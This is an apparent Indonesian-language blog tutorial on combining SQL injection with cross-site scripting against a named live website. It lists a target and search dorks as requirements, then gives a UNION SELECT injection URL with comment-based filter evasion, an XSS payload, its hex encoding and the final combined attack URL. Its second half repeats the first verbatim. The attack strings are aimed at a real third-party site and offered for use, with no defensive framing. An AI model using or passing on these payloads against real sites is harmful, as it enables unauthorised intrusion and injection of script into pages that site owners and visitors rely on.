Tutorial xss In sqli
Welcome lur kali ini we akan share tutorial
Tutorial xss In sqli
Bahan
1.kuota
2.hp/pc
3.target
4.Dork
4.Dork
Dh lh mld
Langsung aja ke live target
Oke kita akan melakukan sqlinjection seperti biasanya
Kalao belum bisa bisa cek Di sini
Oke saya menemukan eror di 7
Maka web nya ada 6 coloum seperti di bawah
http://www.icdcprague.org/index.php?id=10'+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,4,5,6--+-
Nah gimana biar bisa xss sekaligus kita tambahkan playload xss nya di yang eror
<img src=x onerror=confirm(/XSS/)>
Kalo g bisa kita corvert ke hex jadi seperti di bawah
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
Jadinya akan seperti ini
http://www.icdcprague.org/index.php?id=10'+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,5,6--+-
Ok thanks sekian tutor dari gw :*
Nah gimana biar bisa xss sekaligus kita tambahkan playload xss nya di yang eror
<img src=x onerror=confirm(/XSS/)>
Kalo g bisa kita corvert ke hex jadi seperti di bawah
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
Jadinya akan seperti ini
http://www.icdcprague.org/index.php?id=10'+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,5,6--+-
Ok thanks sekian tutor dari gw :*